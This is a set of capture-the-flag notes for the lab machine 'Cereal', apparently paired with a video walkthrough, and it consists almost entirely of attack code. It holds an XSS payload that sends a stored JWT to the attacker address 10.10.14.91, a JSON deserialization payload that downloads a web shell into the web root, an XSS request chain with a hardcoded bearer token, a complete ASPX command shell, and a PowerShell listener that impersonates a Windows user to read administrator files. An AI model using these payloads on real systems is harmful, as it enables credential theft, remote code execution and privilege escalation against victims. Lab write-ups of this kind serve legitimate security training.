xct's notes
Search…
Cereal
Notes for https://youtu.be/tjaW1KC7lBI

GitTools

Auth Fiddle

Steal JWT from Local Storage via XSS

1
{
2
"RequestID":1000,
3
"json":"{\"title\":\"[y](javascript: (function () {window.location.href=\\\"http://10.10.14.91:8000/x\\\"+localStorage.getItem('currentUser');})(););\",\"flavor\":\"x)\",\"color\":\"x\",\"description\":\"x\"}"
4
}
Copied!

Deserialization Fiddle

Store Deserialization Payload

1
{
2
"RequestId":1001,
3
"JSON":"{\"$type\":\"Cereal.DownloadHelper, cereal, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\",\"URL\":\"http://10.10.14.91/cmd.aspx\",\"FilePath\":\"c:\\\\inetpub\\\\source\\\\uploads\\\\xct.aspx\"}"
4
}
Copied!

Trigger Deserialization Payload via XSS

1
{
2
"json":"{\"title\":\"[xhr](javascript:(function () {var x1=new XMLHttpRequest();x1.open('GET','https://cereal.htb/requests/1001');x1.setRequestHeader('Authorization','Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjEiLCJuYmYiOjE2MDYwNTcxMTksImV4cCI6MTkyMTU4OTkxOSwiaWF0IjoxNjA2MDU3MTE5fQ.o9NIIeA9lnbaIopr3y1BlVh46l10OdOIfBX7wyspoBY');x1.withCredentials=true;x1.send();var x2=new XMLHttpRequest();x2.open('GET','https://10.10.14.91:8000/proof');x2.setRequestHeader('Authorization','Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjEiLCJuYmYiOjE2MDYwNTcxMTksImV4cCI6MTkyMTU4OTkxOSwiaWF0IjoxNjA2MDU3MTE5fQ.o9NIIeA9lnbaIopr3y1BlVh46l10OdOIfBX7wyspoBY');x2.withCredentials=true;x2.send();})();)\",\"flavor\":\"x)\",\"color\":\"x\",\"description\":\"x\"}"
3
}
Copied!

ASPX Shell

1
<%@ Page Language="C#" Debug="true" Trace="false" %>
2
<%@ Import Namespace="System.Diagnostics" %>
3
<%@ Import Namespace="System.IO" %>
4
<script Language="c#" runat="server">
5
void Page_Load(object sender, EventArgs e)
6
{
7
}
8
string ExcuteCmd(string arg)
9
{
10
ProcessStartInfo psi = new ProcessStartInfo();
11
psi.FileName = "cmd.exe";
12
psi.Arguments = "/c "+arg;
13
psi.RedirectStandardOutput = true;
14
psi.UseShellExecute = false;
15
Process p = Process.Start(psi);
16
StreamReader stmrdr = p.StandardOutput;
17
string s = stmrdr.ReadToEnd();
18
stmrdr.Close();
19
return s;
20
}
21
void cmdExe_Click(object sender, System.EventArgs e)
22
{
23
Response.Write("<pre>");
24
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
25
Response.Write("</pre>");
26
}
27
</script>
28
<HTML>
29
<HEAD>
30
<title>awen asp.net webshell</title>
31
</HEAD>
32
<body >
33
<form id="cmd" method="post" runat="server">
34
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
35
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
36
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
37
</form>
38
</body>
39
</HTML>
40
41
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
42
<!-- http://michaeldaw.org 04/2007 -->
Copied!

Impersonation PowerShell Webserver

1
[System.Reflection.Assembly]::LoadWithPartialName("System.Web")
2
$listener = New-Object System.Net.HttpListener
3
$listener.Prefixes.Add("http://localhost:7000/")
4
$listener.AuthenticationSchemes = [System.Net.AuthenticationSchemes]::IntegratedWindowsAuthentication
5
$listener.Start()
6
7
do {
8
Write-Host "Listening..."
9
$context = $listener.GetContext()
10
$requestUrl = $context.Request.Url
11
$response = $context.Response
12
$context.User.Identity.Impersonate()
13
14
$Content = ""
15
try{
16
# run any command as admin here
17
type C:\users\administrator\desktop\root.txt
18
} catch [System.UnauthorizedAccessException] {
19
$response.StatusCode = 401
20
$Content = [System.Text.Encoding]::UTF8.GetBytes("")
21
} catch [System.Management.Automation.ItemNotFoundException] {
22
$response.StatusCode = 404
23
$Content = [System.Text.Encoding]::UTF8.GetBytes("")
24
} catch {
25
$_
26
$Content = "$($_.InvocationInfo.MyCommand.Name) : $($_.Exception.Message)"
27
$Content += "$($_.InvocationInfo.PositionMessage)"
28
$Content += " + $($_.CategoryInfo.GetMessage())"
29
$Content += " + $($_.FullyQualifiedErrorId)"
30
$Content = [System.Text.Encoding]::UTF8.GetBytes($Content)
31
$response.StatusCode = 500
32
}
33
$response.ContentLength64 = $Content.Length
34
$response.OutputStream.Write($Content, 0, $Content.Length)
35
$response.Close()
36
Start-Sleep -Seconds 1
37
} while ($listener.IsListening)
Copied!
Last modified 4mo ago
Copy link